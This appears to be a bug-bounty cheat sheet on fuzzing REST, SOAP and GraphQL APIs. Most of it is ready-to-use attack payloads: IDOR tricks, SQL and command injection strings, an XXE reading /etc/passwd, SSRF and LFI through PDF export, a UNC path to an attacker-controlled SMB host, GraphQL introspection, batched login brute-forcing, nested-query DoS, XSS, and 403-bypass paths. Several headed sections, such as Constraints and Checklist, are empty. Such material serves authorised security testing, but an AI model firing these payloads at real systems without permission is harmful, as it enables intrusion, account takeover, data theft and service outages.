API Fuzzing for Bug Bounty

API Fuzzing for Bug Bounty

Purpose

Provide comprehensive techniques for testing REST, SOAP, and GraphQL APIs during bug bounty hunting and penetration testing engagements. Covers vulnerability discovery, authentication bypass, IDOR exploitation, and API-specific attack vectors.

Inputs/Prerequisites

Outputs/Deliverables

API Types Overview

Core Workflow

Step 1: API Reconnaissance

Identify API type and enumerate endpoints:

# Check for Swagger/OpenAPI documentation
/swagger.json
/openapi.json
/api-docs
/v1/api-docs
/swagger-ui.html
Use Kiterunner for API discovery

kr scan https://target.com -w routes-large.kite
Extract paths from Swagger

python3 json2paths.py swagger.json

Step 2: Authentication Testing

# Test different login paths
/api/mobile/login
/api/v3/login
/api/magic_link
/api/admin/login
Check rate limiting on auth endpoints

If no rate limit → brute force possible
Test mobile vs web API separately

Don't assume same security controls

Step 3: IDOR Testing

Insecure Direct Object Reference is the most common API vulnerability:

# Basic IDOR
GET /api/users/1234 → GET /api/users/1235
Even if ID is email-based, try numeric

/?user_id=111 instead of /?user_id=user@mail.com
Test /me/orders vs /user/654321/orders

IDOR Bypass Techniques:

# Wrap ID in array
{"id":111} → {"id":[111]}
JSON wrap

{"id":111} → {"id":{"id":111}}
Send ID twice

URL?id=<LEGIT>&id=<VICTIM>
Wildcard injection

{"user_id":"*"}
Parameter pollution

/api/get_profile?user_id=<victim>&user_id=<legit>
{"user_id":<legit_id>,"user_id":<victim_id>}

Step 4: Injection Testing

SQL Injection in JSON:

{"id":"56456"}                    → OK
{"id":"56456 AND 1=1#"}           → OK  
{"id":"56456 AND 1=2#"}           → OK
{"id":"56456 AND 1=3#"}           → ERROR (vulnerable!)
{"id":"56456 AND sleep(15)#"}     → SLEEP 15 SEC

Command Injection:

# Ruby on Rails
?url=Kernel#open → ?url=|ls
Linux command injection

api.url.com/endpoint?name=file.txt;ls%20/

XXE Injection:

<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>

SSRF via API:

<object data="http://127.0.0.1:8443"/>
<img src="http://127.0.0.1:445"/>

.NET Path.Combine Vulnerability:

# If .NET app uses Path.Combine(path_1, path_2)
Test for path traversal

https://example.org/download?filename=a.png
https://example.org/download?filename=C:\inetpub\wwwroot\web.config
https://example.org/download?filename=\\smb.dns.attacker.com\a.png

Step 5: Method Testing

# Test all HTTP methods
GET /api/v1/users/1
POST /api/v1/users/1
PUT /api/v1/users/1
DELETE /api/v1/users/1
PATCH /api/v1/users/1
Switch content type

Content-Type: application/json → application/xml

GraphQL-Specific Testing

Introspection Query

Fetch entire backend schema:

{__schema{queryType{name},mutationType{name},types{kind,name,description,fields(includeDeprecated:true){name,args{name,type{name,kind}}}}}}

URL-encoded version:

/graphql?query={__schema{types{name,kind,description,fields{name}}}}

GraphQL IDOR

# Try accessing other user IDs
query {
  user(id: "OTHER_USER_ID") {
    email
    password
    creditCard
  }
}

GraphQL SQL/NoSQL Injection

mutation {
  login(input: {
    email: "test' or 1=1--"
    password: "password"
  }) {
    success
    jwt
  }
}

Rate Limit Bypass (Batching)

mutation {login(input:{email:"a@example.com" password:"password"}){success jwt}}
mutation {login(input:{email:"b@example.com" password:"password"}){success jwt}}
mutation {login(input:{email:"c@example.com" password:"password"}){success jwt}}

GraphQL DoS (Nested Queries)

query {
  posts {
    comments {
      user {
        posts {
          comments {
            user {
              posts { ... }
            }
          }
        }
      }
    }
  }
}

GraphQL XSS

# XSS via GraphQL endpoint
http://target.com/graphql?query={user(name:"<script>alert(1)</script>"){id}}
URL-encoded XSS

http://target.com/example?id=%C/script%E%Cscript%Ealert('XSS')%C/script%E

GraphQL Tools

Endpoint Bypass Techniques

When receiving 403/401, try these bypasses:

# Original blocked request
/api/v1/users/sensitivedata → 403
Bypass attempts

/api/v1/users/sensitivedata.json
/api/v1/users/sensitivedata?
/api/v1/users/sensitivedata/
/api/v1/users/sensitivedata??
/api/v1/users/sensitivedata%20
/api/v1/users/sensitivedata%09
/api/v1/users/sensitivedata#
/api/v1/users/sensitivedata&details
/api/v1/users/..;/sensitivedata

Output Exploitation

PDF Export Attacks

<!-- LFI via PDF export -->
<iframe src="file:///etc/passwd" height=1000 width=800>
<!-- SSRF via PDF export -->
<object data="http://127.0.0.1:8443"/>
<!-- Port scanning -->
<img src="http://127.0.0.1:445"/>
<!-- IP disclosure -->
<img src="https://iplogger.com/yourcode.gif"/>

DoS via Limits

# Normal request
/api/news?limit=100
DoS attempt

/api/news?limit=9999999999

Common API Vulnerabilities Checklist

Quick Reference

Tools Reference

Constraints

Must:

Must Not:

Should:

Examples

Example 1: IDOR Exploitation

# Original request (own data)
GET /api/v1/invoices/12345
Authorization: Bearer <token>
Modified request (other user's data)

GET /api/v1/invoices/12346
Authorization: Bearer <token>
Response reveals other user's invoice data

Example 2: GraphQL Introspection

curl -X POST https://target.com/graphql \
  -H "Content-Type: application/json" \
  -d '{"query":"{__schema{types{name,fields{name}}}}"}'

Troubleshooting